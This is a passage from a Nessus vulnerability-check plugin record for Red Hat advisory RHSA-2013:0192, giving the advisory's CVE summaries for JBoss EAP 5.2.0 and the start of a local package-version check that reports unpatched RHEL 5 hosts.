"p-cpe:/a:redhat:enterprise_linux:netty", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-helpers", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2013-0192.NASL", "href": "https://www.tenable.com/plugins/nessus/64079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0192. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64079);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_bugtraq_id(51392, 53877, 54183, 54631, 54915, 55770, 56812);\n script_xref(name:\"RHSA\", value:\"2013:0192\");\n\n script_name(english:\"RHEL 5 : JBoss EAP (RHSA-2013:0192)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix\nmultiple security issues, various bugs, and add several enhancements\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Application Platform 5.1.2, and\nincludes bug fixes and enhancements. Refer to the JBoss Enterprise\nApplication Platform 5.2.0 Release Notes for information on the most\nsignificant of these changes. The Release Notes will be available\nshortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) 